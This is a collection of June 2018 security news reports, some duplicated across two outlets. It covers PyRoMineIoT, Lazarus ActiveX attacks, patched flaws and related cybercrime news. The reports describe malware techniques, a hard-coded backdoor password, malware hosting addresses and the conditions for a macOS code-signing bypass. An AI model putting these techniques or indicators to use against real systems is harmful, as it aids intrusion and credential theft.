Adobe has yet to release any Patch Tuesday updates, but the company did resolve a Flash Player zero-day vulnerability earlier this month. The researchers who came across the exploit revealed that the flaw had been leveraged in attacks aimed at entities in the Middle East.


PyRoMineIoT spreads via EternalRomance exploit and targets targets IoT devices in Iran and Saudi Arabia.
13.6.2018 securityaffairs
Virus

Fortinet discovered PyRoMineIoT, a new strain of crypto-currency miner that exploits the NSA-linked EternalRomance exploit to spread.
PyRoMineIoT is a new strain of crypto-currency miner that exploits the NSA-linked EternalRomance remote code execution exploit to spread, the malware also abuses infected machines to scan for vulnerable Internet of Things (IoT) devices.

PyRoMineIoT is quite similar to another crypto-currency miner dubbed PyRoMine that was first spotted a few weeks ago, its infections rapidly increased since April, most of them in Singapore, India, Taiwan, Côte d’Ivoire, and Australia.

According to Fortinet, the older miner was improved with some obfuscation, the latest variant PyRoMine is hosted on the same IP address 212[.]83.190[.]122, and both variants leverage the EternalRomance implementation found on the Exploit Database website.

PyRoMineIoT is delivered from a website disguised as security updates for web browsers.

Once the PyRoMineIoT malware has compromised a device, it will download an obfuscated VBScript that has the same functionality as the one used by the PyRoMine variant, but its code appears well organized.

The VBScript also downloads other components, including a Monero miner (XMRig), but differently from previous variant it uses ransom names for the files.

“As with the previous version of PyRoMine, this new version is hosted on the same IP address 212.83.190.122. The downloaded file is an executable compiled with PyInstaller, which is a program that packages programs written in Python into stand-alone executables. This means that there is no need to install Python on the machine in order to execute the Python program.” reads the analysis published by Fortinet.

Both variants sets up a Default account with the password P@ssw0rdf0rme and adds the account to the local groups “Administrators,” “Remote Desktop Users,” and “Users,” then it enables RDP and adds a firewall rule to allow traffic on port 3389.

Once compromised a device, PyRoMineIoT attempts to remove PyRoMine variant if present.

The analysis of one of the pool addresses used by the threat actors behind the malware revealed it earned around 5 Monero (about $850).

pyromineiot
The victim downloads a fake update as .zip archives containing a downloader written in C# that fetches the miner file, a Python-based malware that leverages EternalRomance to spread the downloader, and other malicious components.

“One of the downloaded components is a Python-based malware that takes advantage of the NSA exploit ETERNALROMANCE to spread the agent to vulnerable machines in the network. Another component is a tool that steals user credentials from Chrome browser named ChromePass.” continues the analysis.

“Another component scans for vulnerable IoT devices in Iran and Saudi Arabia that use the login credentials “admin” for username and password.”

pyromineiot

The EternalRomance implementation collects the IPs of local subnets and targets them to spread using credentials with username ‘aa’ and an empty password.

Another component used by the malware is the legitimate software ChromePass that allows seeing credentials from Chrome.

Once the credentials are collected by the malware, it saves them in XML format and uploads the file to an account on DriveHQ’s cloud storage service.

PyRoMineIoT searches for vulnerable IoT devices, but at the time it only targets those in Iran and Saudi Arabia.

“This development confirms yet again that malware authors are very interested in cryptocurrency mining, as well as in capturing a chunk of the IoT threat ecosystem.” Fortinet concludes.

“We predict that this trend will not fade away soon, but will continue as long as there are opportunities for the bad guys to easily earn money by targeting vulnerable machines and devices,”


North Korea-linked Lazarus APT behind recent ActiveX attacks
13.6.2018 securityaffairs APT

North Korea-linked Lazarus APT group planted an ActiveX zero-day exploit on the website of a South Korean think tank focused on national security.
According to researchers at AlienVault, North Korea-linked hackers planted an ActiveX zero-day vulnerability on the website of a South Korean think tank focused on national security.

The experts attributed the attack to the notorious Lazarus APT group in attacks, they pointed out that ActiveX controls are usually disabled on most systems, but the South Korean government authorities demand citizens to enable them.

“Recently, an ActiveX zero-day was discovered on the website of a South Korea think tank that focuses on national security. Whilst ActiveX controls are disabled on most systems, they are still enabled on most South Korean machines due to mandates by the South Korean government.” reads the post published by Alien Vault.

“These attacks have been attributed to Lazarus, a group thought to be linked to North Korea.”

Of course, attackers that aimed at South Korean targets could leverage ActiveX controls in their attacks. Many attacks that abused these controls against South Korean targets were attributed to North Korean hackers.

Recently experts observed attacks where hackers leveraged JavaScript code to deploy ActiveX exploit codes.

Initially, local media attributed the attacks to the Andariel gang, a gang that is considered part Lazarus APT group.

The investigation conducted by AlienVault pointed out the Lazarus APT as the threat actor that launched the attacks that abused the ActiveX controls.

The recent attacks featured a profiling script used to gather intelligence on the targets, this attack scheme was commonly used by threat actors including the Lazarus group.

The attackers also used scripts capable of gathering additional information from the potential targets and deliver the ActiveX exploit.

Simon Choi, the founder of the Cyber Warfare Intelligence Center and IssueMakersLab, published a tweet with some details of these scripts.

The expert suggests the initial reconnaissance scripts were deployed in January 2017, while script the malicious ActiveX controls were injected in late April 2018.

Simon Choi
@issuemakerslab
North Korea's Watering Hole Attack History (case, Sejong Institute)

9:21 AM - May 24, 2018
31
17 people are talking about this
Twitter Ads info and privacy
The reconnaissance script allows to identify the browser and operating system running on the target computer, it is based on the PinLady’s Plugin-Detect code. The malicious code is able to detect if Internet Explorer is running on a machine, then to check if ActiveX is enabled, as well as the plugins running from a specific list of ActiveX components.

“Whilst these malicious files have been taken down, a record of the same infection is preserved on urlscan. The malicious script is hidden at http://www.sejong[.]org/js/jquery-1.5.3.min.js.” continues the analysis.

“This script is similar to typical exploit kits – it identifies which browser and operating system the user is running. Much of the code is taken from PinLady’s Plugin-Detect. If a target is running Internet Explorer, it checks if it is enabled to run ActiveX, and what plugins are enabled from a specific list of ActiveX components”

One of the profiling scripts used in the last attacks sends data to a website that was used as a command and control (C&C) server by Lazarus APT malware in 2015.

Choi also shared the ActiveX exploit on Twitter, it was used by attackers to download malware from peaceind[.]co.kr.

“If successful, it downloads malware from: http://www.peaceind[.]co.kr/board/skin_poll/gallery/poll.php” continues Alien Vault.

“To a file named splwow32.exe. Splwow32.exe is a fairly uncommon filename for malware, and was previously seen in the Taiwan bank heist which has been attributed to another sub-set of the Lazarus attackers. We also note that the peaceind[.]co.kr site has been previously identified as vulnerable.”

Experts noticed that the malicious code is a backdoor tracked as Akdoor that is designed to execute commands using Command Prompt.

Further details, including IoCs are reported in the analysis published by Alien Vault.


Microsoft Patch Tuesday updates for June 2018 addresses 11 Critical RCE Flaws
13.6.2018 securityaffairs
Vulnerebility

Microsoft issued Patch Tuesday updates for June 2018 that address a total of 50 vulnerabilities, 11 of which are critical remote code execution flaws.
Microsoft issued Patch Tuesday updates for June 2018 that address a total of 50 flaws, 11 critical remote code execution vulnerabilities and 39 issues rated as important.

The tech giant also issued some mitigations for the recently discovered Spectre/Meltdown Variant 4 vulnerabilities.

The critical issues affect Windows and the company web browsers Edge and Internet Explorer.

None of the patched vulnerabilities have been exploited in attacks in the wild, only one of them, a remote code execution flaw in the scripting engine tracked as CVE-2018-8267 has been publicly disclosed before the release of a fix.

The flaw is a remote memory-corruption issue affecting Microsoft Internet Explorer that resides within the IE rendering engine. The flaw is triggered when the engine fails to properly handle the error objects, the attack could exploit the issue to execute arbitrary code in the context of the currently logged-in user.

Microsoft acknowledged the security researcher Dmitri Kaslov for reporting the flaw.

The most critical flaw addressed by the Patch Tuesday updates for June 2018 is a remote code execution vulnerability tracked as CVE-2018-8225 that resides in Windows Domain Name System (DNS) DNSAPI.dll.

The flaw affects all versions of Windows starting from 7 to 10, as well as Windows Server editions, it ties the way Windows parses DNS responses.

An attacker could exploit the flaw by sending corrupted DNS responses to a targeted system from an attacker-controlled malicious DNS server. Once the attacker has exploited the flaw he will be able to run arbitrary code in the context of the Local System Account.

“This vulnerability could allow an attacker to execute code at the local system level if they can get a crafted response to the target server. There are a couple of ways this could happen.” reads the analysis published by Trend Micro Zero Day Initiative (ZDI).

“The attacker could attempt to man-in-the-middle a legitimate query. The more likely scenario is simply tricking a target DNS server into querying an evil server that sends the corrupted response – something that can be done from the command line. It’s also something that could be easily scripted. This means there’s a SYSTEM-level bug in a listening service on critical infrastructure servers, which also means this is wormable.”

Microsoft Patch Tuesday updates for June 2018

Another critical flaw addressed with the Patch Tuesday updates for June 2018 is a remote code execution flaw tracked as CVE-2018-8231 that resides in the HTTP protocol stack (HTTP.sys) of Windows 10 and Windows Server 2016.

The flaw could allow remote attackers to execute arbitrary code and take control of the affected systems.

This vulnerability originates when HTTP.sys improperly handles objects in memory, allowing attackers to send a specially crafted packet to an affected Windows system to trigger arbitrary code execution.

“This patch covers another serious bug in a web-facing service. This time, the web server component http.sys is affected. A remote attacker could cause code execution by sending a malformed packet to a target server. Since http.sys runs with elevated privileges, the attacker’s code would get that same privilege. ” continues ZDI.

The Patch Tuesday updates for June 2018 also addresses a privilege escalation vulnerability affecting the Cortana voice assistant. The flaw, tracked as CVE-2018-8140, is a privilege escalation vulnerability rated as “important.”

In this case, the attacker needs physical or console access to the system to trigger the flaw.


New 'PyRoMineIoT' Malware Spreads via NSA-Linked Exploit
12.6.2018 securityweek 
Virus 

A recently discovered piece of crypto-currency miner malware isn’t only abusing a National Security Agency-linked remote code execution exploit to spread, but also abuses infected machines to scan for vulnerable Internet of Things (IoT) devices.

Dubbed PyRoMineIoT, the malware is similar to the PyRoMine crypto-currency miner that was detailed in late April. Both mine for Monero, both are Python-based, and both use the EternalRomance exploit for propagation purposes (the vulnerability was patched in April last year).

The older threat, Fortinet’s Jasper Manuel reveals, has received an update to add some obfuscation, likely in an attempt to evade detection from anti-virus programs.

The latest PyRoMine variant is hosted on the same IP address 212[.]83.190[.]122, was compiled with PyInstaller into a stand-alone executable, and continues to use the EternalRomance implementation found on the Exploit Database website, the same as the initially analyzed variant.

After a successful exploitation, an obfuscated VBScript is downloaded. The VBScript has the same functionality as the previously used one, but features more organized code and also adds a version number.

The same as before, it sets up a Default account with the password P@ssw0rdf0rme and adds the account to the local groups “Administrators,” “Remote Desktop Users,” and “Users,” after which it enables RDP and adds a firewall rule to allow traffic on port 3389.

The VBScript also downloads other components, including a Monero miner (XMRig), but now uses randomly generated names for these files. The malware attempts to remove older versions of PyRoMine from the system.

One of the pool addresses used by the malware suggests the actors made around 5 Monero (about $850) from their nefarious activities. The malware has infected a large number of systems since April, with the top 5 affected countries being Singapore, India, Taiwan, Côte d’Ivoire, and Australia.

The newly discovered PyRoMineIoT, Manuel says, is similar to PyRoMine, hence the similar naming. The threat is served from “an obviously malicious looking website,” disguised as security updates for web browsers.

The fake updates are downloaded as .zip archives that contain a downloader agent written in C#. This agent fetches the miner file and other malicious components, including a Python-based malware that leverages EternalRomance to spread the downloader to vulnerable machines in the network.

The agent also fetches a component to steal user credentials from Chrome, and another to scan for IoT devices in Iran and Saudi Arabia that use the admin: admin username and password pair.

The EternalRomance implementation uses the same code base as PyRoMine and works in a similar manner, collecting the IPs of local subnets and iterating through them to execute the payload. It uses the username ‘aa’ with an empty password.

The second component is part of the legitimate ChromePass tool that allows users to recover passwords from the Chrome browser. As part of these attacks, it is abused to steal credentials from unsuspecting users: the tool saves the recovered credentials in XML format and uploads the file to an account on DriveHQ’s cloud storage service (the account has been already disabled).

The most interesting aspect of this malware, however, is its ability to search for vulnerable IoT devices, but it only targets those in Iran and Saudi Arabia for that. The threat sends the IP information of discovered devices to the attacker’s server, supposedly in preparation for further attacks.

The same as PyRoMine, the malware downloads the XMRig miner on the compromised system. After checking one of the pool addresses used by the threat, however, the researcher discovered that it hasn’t generated revenue yet. This, however, isn’t surprising, considering that the malware only started being distributed on June 6, 2018, and is an unfinished project.

“This development confirms yet again that malware authors are very interested in cryptocurrency mining, as well as in capturing a chunk of the IoT threat ecosystem. We predict that this trend will not fade away soon, but will continue as long as there are opportunities for the bad guys to easily earn money by targeting vulnerable machines and devices,” Fortinet concludes.


North Korean Hackers Abuse ActiveX in Recent Attacks
12.6.2018 securityweek  BigBrothers

An ActiveX zero-day vulnerability discovered recently on the website of a South Korean think tank focused on national security has been abused by the North Korean-linked Lazarus group in attacks, AlienVault reports.

ActiveX controls are usually disabled on most systems, but the South Korean government demands they are enabled on machines in the country. This has led to numerous attacks abusing ActiveX to compromise systems in South Korea, with many of the attacks attributed to North Korean hackers.

The same applies to the newly observed attacks, where JavaScript code was used to deploy various ActiveX vulnerabilities, including a zero-day. Soon after the attacks occurred, local media attributed them to the Andariel gang, which is said to be part of Lazarus, the state-sponsored hacking group considered the most serious threat against banks.

Also referred to as BlueNoroff, the group has orchestrated high profile attacks such as the devastating attack against Sony Pictures in late 2014 and the $81 million cyber heist from Bangladesh's account at the New York Federal Reserve Bank in 2016. This year, the actor supposedly switched targets to cryptocurrency, but also hit an online casino in Central America.

According to a new AlienVault report, the Lazarus hackers were behind the recently revealed ActiveX attacks as well.

The group used a profiling script as the initial reconnaissance tool, in an attempt to gather information on possible targets. Although this is a tactic the Lazarus group has employed before, other threat actors use it as well.

The next step of the attack involved scripts capable of gathering additional information from the system and designed to deliver the ActiveX exploit.

In a tweet several weeks ago, Cyber Warfare Intelligence Center and IssueMakersLab founder Simon Choi shared some details on the scripts used in the assault, revealing that an initial reconnaissance stage was deployed in January 2017, while script injections only occurred in late April 2018.

The script was designed to identify the browser and operating system running on the victim’s machine and borrows much of the code from PinLady’s Plugin-Detect. When detecting Internet Explorer on a machine, the script checks if ActiveX is enabled, as well as plugins running (from a specific list of ActiveX components).

AlienVault also notes that one of the other scripts involved in the attack, apparently used for profiling, sends data to a website that might have been compromised a while back, as it was previously recorded as a command and control (C&C) server for Lazarus malware in 2015.

The ActiveX exploit used in the recent assault, also shared by Simon Choi on Twitter, was meant to download malware from peaceind[.]co.kr and save it to the system as splwow32.exe.

“Splwow32.exe is a fairly uncommon filename for malware, and was previously seen in the Taiwan bank heist which has been attributed to another sub-set of the Lazarus attackers. We also note that the peaceind[.]co.kr site has been previously identified as vulnerable,” AlienVault says.

The malware appears to be called Akdoor, a simple backdoor designed to execute commands using Command Prompt. The malware also uses a “distinctive command and control protocol,” the security researchers say.


Crestron Patches Command Injection Flaw in DGE-100 Controller
12.6.2018 securityweek  ICS

Crestron recently addressed a command injection vulnerability in the console service preinstalled on the Digital Graphics Engine 100 (DGE-100) and other hardware controllers made by the company.

Tracked as CVE-2018-5553, the vulnerability has a base CVSSv3 score of 9.8 and is considered Critical severity. Discovered by Rapid7, the security bug is the result of lack of input sanitization and allows an attacker able to connect to the device over TCP port 41795 to gain root-level access.

The DGE-100 controller allows users to connect a touchscreen interface to external sources over HDMI, USB, or Ethernet. The device, which is usually paired with the Crestron TSD-2220 HD touchscreen display, is typically deployed in corporate meeting spaces or control rooms and is distributed globally.Critical vulnerability in Crestron DGE-100

The Crestron console service on DGE-100 is listening on TCP port 41795 and requires “a proprietary management tool” to use. The hardware controller, however, does not require credentials for administrative access to the console service by default.

Critical vulnerability in Crestron DGE-100

“By connecting to this service with netcat and using the `ping` command with an argument constructed of shell-expandable variables, it is possible to inject operating system commands that will be executed by this console, which itself runs as root,” Rapid7 explains in a report.

The vulnerability occurs only if the default configuration is left in place, which means that credentials are not required for administrative access. Thus, anyone able to connect to the device’s TCP port 41795 can elevate to a root shell on the device, the security firm explains.

By exploiting the issue, an attacker could co-opt the device for a persistent “beachhead” into the affected network. The attacker would have unfettered access to the device’s core functionality, thus being able to intercept and modify any data, including what’s served over the Ethernet, HDMI, or USB ports.

The issue was discovered in March 2018 and reported to the vendor in early April. All DGE-100 devices running firmware version 1.3384.00049.001 and lower with default configuration are vulnerable. Crestron noted in an advisory published last week that TS-1542-C and DM-DGE-200-C devices are also impacted.

A patch was released on June 4 and owners of affected devices are advised to apply it as soon as possible. The update (firmware 1.3384.00059.001 or higher address the bug) is available on Crestron’s website.

“Crestron took immediate action upon receiving the information and has created updates to remediate this concern. Crestron has no evidence of any customers being impacted by this issue. If customers have configured their systems based on our published security best practices, then the risk is low as an authenticated user would be required to exploit this vulnerability,” the vendor said.


Code Signing Flaw Affects all Mac OS Versions Since 2005
12.6.2018 securityweek  Apple

Okta Rex (Research and Exploitation) researcher Josh Pitts has discovered a method of exploiting the code signing mechanism in MacOS. If exploited, the flaw could allow malicious untrusted code to masquerade as legitimate trusted code and bypass checks by other security software.

Code signing attacks are not new. However, writes Pitts in public disclosure published today, "Unlike some of the prior work, this current vulnerability does not require admin access, does not require JITíing code, or memory corruption to bypass code signing checks. All that is required is a properly formatted Fat/Universal file and code signing checks return valid." Any Mac operating system since the 2005 introduction of OS X Leopard is vulnerable to this flaw.

Code signing works by cryptographically confirming that new code is authentic and not malicious code authored by a bad actor impersonating the original developer. While almost anything, from binaries to PowerShell scripts, can be signed on Windows, on MacOS code signing focuses on the Mach-O binary and application bundles to ensure only trusted code is executed in memory.

"Security, incident response, and forensics processes and personnel use code signing to weed out trusted code from untrusted code," explains Pitts. "By verifying signed code, detection and response personnel can speed up investigations by separating trusted code from untrusted code."

Pitts discovered, however, that the code signing mechanism in MacOS can be manipulated. All it requires is access to a genuinely signed Fat/Universal file. Other conditions require that the first Mach-O in the file must be validly signed by Apple; the added malicious code must be adhoc signed and i386 compiled for an x86_64 bit target macOS; and the CPU_TYPE in the Fat header must be set to an invalid type or CPU Type that is not native to the host chipset.

Okta Rex told SecurityWeek that this technique bypasses the gambit of whitelisting, incident response, and process inspection solutions by appearing to be signed by Apple's own root certificate.

The simple explanation is that the mechanism accepts the Apple signing, but skips this code and executes the malicious code. "By setting the CPU_Type to an invalid type or valid not native CPU type (example: PPC), the Mach-O loader will skip over the validly signed Mach-O binary and execute the malicious (non-Apple signed) code," writes the researcher.

In effect, the good code is skipped because CPU_TYPE is wrong; but the subsequent malicious code is run because the code signing API has a preference for the native CPU architecture (x86_64) for code signing checks and will default to checking the unsigned code if it is x86_64.

Okta Rex contacted Apple on February 22, 2018 with a report and proof of concept examples that were able to bypass third-party security tools. Apple responded in March by saying it did not see this issue as a security problem that it should directly address.

Okta Rex disagreed, and informed Apple that it would notify third-party developers itself so that they could address the issues at their end. By early April it had notified — through CERT/CC — all known affected third party developers. These include VirusTotal, Google, Facebook, Objective Development, F-Secure, Objective-See, Yelp, and Carbon Black.

The researcher also recommended to CERT/CC on April 18 "that a public blog post is the best method for reaching third parties that use code signing APIs in a private manner."

The researcher is not aware of any prior abuse of this technique by bad actors. Nevertheless, by exploiting this vulnerability, a threat actor could trick third-party security tools into believing their code is Apple-approved, letting malicious code live on a macOS machine until it’s patched.


$175 Million in Monero Mined via Malicious Programs: Report
12.6.2018 securityweek  Cryptocurrency

The popularity of crypto-currency malware has been skyrocketing over the past year, and the segment appears to have been highly lucrative for cybercriminals, a new Palo Alto Networks report reveals.

With the number of malware samples ultimately delivering crypto-miners well over the half a million mark, it’s no wonder that miscreants are able to profit from this type of nefarious activity. To these, one can add the JavaScript, or web-based, malicious mining operations, which are highly lucrative as well.

Looking into the proliferation of crypto-mining malware, Palo Alto’s Josh Grunzweig discovered information on around 630,000 malicious samples, 3,773 emails used to connect with mining pools, and 2,995 mining pool URLs.

Over 530,000 malware samples target Monero, roughly 53,000 target Bitcoin, and 16,000 target Cryptonite (XCN), with the rest spread across the remaining currencies. The researcher also identified 2,341 Monero (XMR) wallets, 981 Bitcoin (BTC) wallets, 131 Electroneum (ETN) wallets, 44 Ethereum (ETH) wallets, and 28 Litecoin (LTC) wallets.

Given the clear interest cybercriminals have in Monero, the researcher focused on this virtual coin as well. In addition to the 2,341 Monero wallets extracted from the analyzed sample set, he also managed to determine the mining pools used, and discovered that, of the top ten mining pools used by this malware, all but one allows for anonymous viewing of statistics based off of the wallet as an identifier.

“By querying the top eight mining pools for all 2,341 Monero addresses, I was able to determine exactly how much Monero has been mined historically with a high degree of accuracy. By querying the mining pools themselves, instead of the blockchain, we’re able to say exactly how much has been mined without the fear of the data being polluted by payments to those wallets via other sources,” he notes.

Thus, Grunzweig determined that a total of 798613.33 XMR has been mined to date, representing around 5% of all Monero in circulation. Web-based Monero miners and miners the researcher doesn’t have visibility into aren’t included here.

While half of the 2,341 wallets identified have been unable to generate a meaningful amount of Monero, the remaining batch obtained over $140 million, the researcher estimates. According to Grunzweig, “a total of $175m has been found to be mined historically via the Monero currency.”

1,278 (55%) of the identified wallets earned 0.01 XMR (~$2.20) or more and only a small subset earned a significant (100 XMR or greater) amount of coins. Only 99 wallets (less than 2% of all wallets identified) have received over 1,000 XMR, and 16 wallets (0.68% of all wallets) have obtained over 10,000 XMR.

Looking at the total hashing power, the research revealed the attackers only used 2% of the global hashing power mining the Monero network. At around 19MH/s, the hashrate would result in approximately $30,443 per day being mined.

“To date, the popularity of malicious cryptocurrency mining activity continues to skyrocket. The large growth of malware mining cryptocurrencies is a direct result of a previous spike in value, which has since corrected to a value that is more in line with expectations. As this correction has taken place, only time will tell if cryptocurrency miners will continue in popularity. It is clear that such activities have been incredibly profitable for individuals or groups who have mined cryptocurrency using malicious techniques for a long period of time,” Palo Alto concludes.


VMware addresses a critical remote code execution vulnerability in AirWatch Agent
12.6.2018 securityaffairs
Vulnerebility

VMware has found a critical remote code execution vulnerability in the AirWatch Agent applications for Android and Windows Mobile.
The agent is installed by users on a mobile device in order to allow the AirWatch to manage it.

The flaw, tracked as CVE-2018-6968, “may allow for unauthorized creation and execution of files in the Agent sandbox and other publicly accessible directories such as those on the SD card by a malicious administrator.”

“Due to an authorization flaw in the real-time File Manager capability for Android and Windows Mobile devices and Registry Manager for Windows Mobile devices, it is possible for a remote attacker with knowledge of specific enrolled devices within an AirWatch instance to add or remove files from a device, remotely execute commands on the device, or modify or set Registry Key values for Windows Mobile devices that are configured to use AirWatch Cloud Messaging (AWCM).” reads the advisory published by VMware.

“This vulnerability is identified by CVE-2018-6968 and is documented in VMSA-2018-0015”

“The attacker does not need access to the Workspace ONE UEM Console. Access to read and store files on Android devices is limited to files within the Agent sand­­box and other publicly accessible directories such as those on the SD card. Access to files on Windows Mobile/CE devices involves the entire device directory,” it added.

VMware airwatch

VMware has addressed the flaw with the release of version 8.2 for Android and 6.5.2 for Windows Mobile, iOS version of the VMware AirWatch agent is not impacted.

Experts also provided a workaround for Android users who can choose C2DM/GCM instead of AWCM as their preferred push notification service.

The security updates address the vulnerability by disabling the flawed file, task, and registry management capabilities. VMware will deprecate the functionality in the next months.

“Through mitigation of this security vulnerability, the File, Task & Registry Management capabilities built into AWCM will be disabled in current SaaS environments over the coming weeks. Additionally, this functionality will be deprecated in future releases of the Workspace ONE UEM Console.”


Splunk to Acquire DevOps Alert Firm VictorOps for $120 Million
12.6.2018 securityweek  IT

Machine data solutions firm Splunk announced Monday that it has agreed the acquisition of alert management start-up VictorOps for approximately $120 million. The acquisition is expected to close during Splunk's FQ2, subject to customary closing conditions, and will be funded by cash out of Splunk's balance sheet.

The acquisition makes sense. Splunk uses data analytics and artificial intelligence to locate alert incidents within masses of log data. VictorOps manages the delivery of alerts to the right on-call technical staff. Together, they combine data analytics with DevOps practices.

"The world is changing," explains VictorOps' CEO and co-founder Todd Vernon in an associated blog. "Companies are increasingly relying on software for their competitive advantage in business. Software that historically changed a few times a year, now changes hourly or even by the minute in progressive, market-savvy companies."

VictorOps was founded to provide a collaborative way to quickly resolve software incidents. "By combining VictorOps incident management capabilities and the Splunk platform," Vernon continued, "organizations will be able to quickly resolve and even help prevent issues that degrade customer engagement. We look forward to joining Splunk and working together to help solve these complex challenges facing every Development and DevOps team."

"The combination of machine data analytics and artificial intelligence from Splunk with incident management from VictorOps creates a 'Platform of Engagement' that will help modern development teams innovate faster and deliver better customer experiences," added Doug Merritt, president and CEO at Splunk. The intention is the integration of Splunk Enterprise with VictorOps will deliver monitoring, event management, on-call management and ChatOps.

'Platform of engagement' is also the term used by VictorOps. "Modern Incident Management," wrote Vernon, "is in a period of strategic change where data is king, and insights from that data are key to maintaining a market leading strategy. We look forward to working together to create a 'Platform of Engagement' that uses the most actionable information available and correlates monitoring and incident management data to foster shared understanding, speed resolution, and leverage AI to recommend solutions."

The acquisition of VictorOps builds on the earlier $350 million acquisition of Phantom. While Phantom also helps automate IT teams' responses to alerts, it lacks VictorOps' team collaboration capabilities.

VictorOps was founded in 2012 by Bryce Ambraziunas, Dan Jones and Todd Vernon. In 2016 it raised $15 million in Series B funding, bringing the total funding raised to $33.7 million. Investors include Silicon Valley firms Shea Ventures and Costanoa Ventures.

San Francisco, CA-based Splunk was founded in 2003. VictorOps is its seventh acquisition, including Phantom earlier this year, and SignalSense in October 2017. Both Phantom and VictorOps had a year-long product integration partnership with Splunk prior to acquisition.

"Upon close," wrote Vernon, "VictorOps will join Splunk's IT Markets group and together will provide on-call technical staff an analytics and AI-driven approach for addressing the incident lifecycle, from monitoring to response to incident management to continuous learning and improvement."

Splunk plans to retain VictorOps approximately 90 employees after the acquisition.


U.S. Blacklists Russian Firms Tied to FSB Hacking Ops
12.6.2018 securityweek BigBrothers

The United States placed five Russian companies and three individuals on its sanctions blacklist Monday for allegedly supporting the FSB intelligence agency's hacking operations, including a firm involved in subsea operations.

The US Treasury named Digital Security and two subsidiaries as helping develop offensive cyber capabilities for Russian intelligence services, including the already-sanctioned FSB.

The Kvant Scientific Research Institute was also included on the blacklist, as a state enterprise supervised by the FSB.

In addition, Divetechnoservices and three officials of the firm were sanctioned for supplying and supporting the government's underwater capabilities in monitoring and hacking subsea communications cables around the world.

US officials have become alarmed over the past year at the extent of US-targeted offensive cyber operations that Washington alleges have official backing from Moscow.

Those include the global NotPetya cyber attack, which paralyzed thousands of computers around the world last year; intrusions into the control systems of the US energy grid; and the insertion of trojans into home and company networking devices around the world, which allow both the diversion of data and attacks that could shut down networks.

The sanctions freeze property and assets under US jurisdiction and seek to lock those named out of global financial networks.


74 Arrested in International Operation Targeting BEC Scams
12.6.2018 securityweek Crime

A total of 74 individuals have been arrested as part of an international law enforcement operation targeting business email compromise (BEC) scams, U.S. authorities announced on Monday.

Forty-two people have been arrested in the United States, 29 in Nigeria, and three in Canada, Mauritius, and Poland. The operation, dubbed “Wire Wire” and conducted over a period of six months, also resulted in the seizure of nearly $2.4 million and the disruption and recovery of roughly $14 million in fraudulent wire transfers, according to the Department of Justice and the FBI.

Some of the suspects are believed to have been involved in schemes targeting businesses of all sizes, while others targeted individual victims.

The Justice Department said 23 individuals were charged in the Southern District of Florida with laundering at least $10 million obtained from BEC scams. The list of suspects also includes two Nigerian nationals living in Dallas, Texas, who tricked a real estate closing attorney into wiring $246,000 to accounts they controlled.

A separate indictment targets three individuals, two of which were extradited to the United States from the United Kingdom and Mauritius.

BEC scams, which authorities also call cyber-enabled financial fraud, often target employees with access to company finances and trick them into making wire transfers to bank accounts controlled by the criminals. The FBI has received reports of losses totaling more than $3.7 billion since the agency’s Internet Crime Complaint Center (IC3) has been keeping track of BEC scams.

“The federal law enforcement agencies that executed on this takedown deserve our gratitude” said Christy Wyatt, CEO of Dtex Systems, a security provider that helps organizations defend their most trusted insiders. “Removing 42 criminals off of our cyber streets will hopefully make things safer, serve as warning to others and provide us with details that will help us to be more secure moving forward. The operation is also a reminder that most major cybercrimes involve employee error and under-utilization of technology and education resources that can be used to defend our most trusted insiders.”


VMware Patches Code Execution Flaw in AirWatch Agent
12.6.2018 securityweek 
Vulnerebility

VMware has addressed a critical remote code execution vulnerability in the AirWatch Agent applications for Android and Windows Mobile.

The VMware Workspace ONE platform, which is powered by AirWatch unified endpoint management (UEM) technology, is designed to help organizations manage corporate endpoints and improve enterprise productivity.

Workspace ONE provides a File Manager application for Android and Windows Mobile/CE and Task/Registry Manager apps for Windows Mobile/CE. These apps use legacy technologies and they are separate from the ones available through the AirWatch platform.

VMware has published an advisory and a support article to warn users that these mobile applications are affected by a critical vulnerability tracked as CVE-2018-6968.

“Due to an authorization flaw in the real-time File Manager capability for Android and Windows Mobile devices and Registry Manager for Windows Mobile devices, it is possible for a remote attacker with knowledge of specific enrolled devices within an AirWatch instance to add or remove files from a device, remotely execute commands on the device, or modify or set Registry Key values for Windows Mobile devices that are configured to use AirWatch Cloud Messaging (AWCM),” VMware said.

“The attacker does not need access to the Workspace ONE UEM Console. Access to read and store files on Android devices is limited to files within the Agent sand­­box and other publicly accessible directories such as those on the SD card. Access to files on Windows Mobile/CE devices involves the entire device directory,” it added.

The security hole has been patched with the release of version 8.2 for Android and 6.5.2 for Windows Mobile. The iOS version of the agent is not impacted.

The updates address the problem by disabling the flawed file, task and registry management capabilities, and VMware says it plans on deprecating the functionality in future releases of the Workspace ONE console.

In late May, VMware informed customers of a vulnerability that allowed a local attacker to escalate privileges to root on Linux machines running VMware Horizon Client for Linux.


Vietnam MPs Approve Sweeping Cyber Security Law
12.6.2018 securityweek BigBrothers

Vietnamese lawmakers on Tuesday approved a sweeping cyber security law which could compel Facebook and Google to take down critical posts within 24 hours, as space for debate is crushed inside the Communist country.

Activists and dissenters are routinely harassed, jailed or tied up in legal cases in Vietnam, a one-party state which is hyper-sensitive to critical public opinion.

Social media and Internet forums have provided a rare platform to share and debate views against authorities.

But the bill, waved through by an overwhelming majority of MPs in the National Assembly, is poised to end that relative freedom.

The law's far-reaching provisions mean internet companies will have to remove posts deemed to be a "national security" threat within a day and store personal information and data of their users inside Vietnam.

"Currently, Google and Facebook store personal data of Vietnamese users in Hong Kong and Singapore," Vo Trong Viet, chairman of National Assembly's defence and security committee told lawmakers.

"Putting data centres in Vietnam will increase expenses for the service providers... but it is necessary to meet the requirements of the country's cyber security."

The new law outlaws material encouraging public gatherings or that "offends" everything from the national flag to the country's leaders and "heroes".

There was no immediate detail of the punishment for violating the new rules.

Only 15 out of the 466 MPs present in the rubber-stamp assembly voted against the bill, which the government says will become law from January 1, 2019.

Rights advocates said it further shrinks the small space for debate.

"In the country's deeply repressive climate, the online space was a relative refuge where people could go to share ideas and opinions with less fear of censure by the authorities," said Clare Algar of Amnesty International.

"With the sweeping powers it grants the government to monitor online activity, this vote means there is now no safe place left."

The Asia Internet Coalition, an advocacy group for behalf of Facebook, Google, Twitter and other tech firms in the region, said it was "disappointed" by the assembly's vote.

"Unfortunately, these provisions, will result in severe limitations on Vietnam's digital economy, dampening the foreign investment climate and hurting opportunities for local businesses and SMEs to flourish inside and beyond Vietnam," said Jeff Paine, managing director of the internet coalition.

The country's conservative leadership, which has been in charge since 2016, is waging a crackdown on activists and dissidents.

At least 26 dissidents and actives have been prosecuted during the first five months this year, according to Human Rights Watch.

